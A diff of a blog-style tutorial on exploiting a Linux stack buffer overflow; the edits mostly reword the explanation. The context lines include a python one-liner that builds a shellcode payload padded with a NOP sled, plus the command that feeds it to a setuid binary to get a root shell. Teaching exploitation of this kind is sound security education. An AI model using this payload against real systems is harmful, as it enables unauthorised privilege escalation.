Reboare/Lagrange/_posts/2017-12-26-linux-stack-bof-1.md

 Wanna Smash!?: 0xffffcfd0
 ```

-In our payload we then place the following shellcode: [http://shell-storm.org/shellcode/files/shellcode-606.php](http://shell-storm.org/shellcode/files/shellcode-606.php)
+In our payload we then place the following shellcode to return us a shell: [http://shell-storm.org/shellcode/files/shellcode-606.php](http://shell-storm.org/shellcode/files/shellcode-606.php)
 ```python
 python -c "from struct import pack; print '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'.ljust(140,'\x90') +  pack('<L', 0xffffcfd0)"  > /tmp/var
 ```

 You'll notice here I've used `ljust` on the shellcode.
-This just pads the string to the determined length of 140 and pads it with NOP instructions, so it makes the process of creating a nopsled slightly easier.
-For example, if we were to replace the shellcode, no other adjustments would be necessary.
+This just pads the string to the determined length of 140 with `NOP` instructions.
+This makes the process of creating a nopsled slightly easier.
+For example, if we were to replace the shellcode, we would just replace the string and the payload would still be of length 140.

 We run the binary, inputting the payload, and we are returned a root shell.
-The uid won't change but the [effective-uid](https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id) or the euid does, meaning we now have root privileges.
+The uid won't change but the [effective-uid](https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id) or the euid does to 0, meaning we now have root privileges.

 ```bash
 ubuntu@ubuntu:/tmp$ (cat /tmp/var; cat) | ./test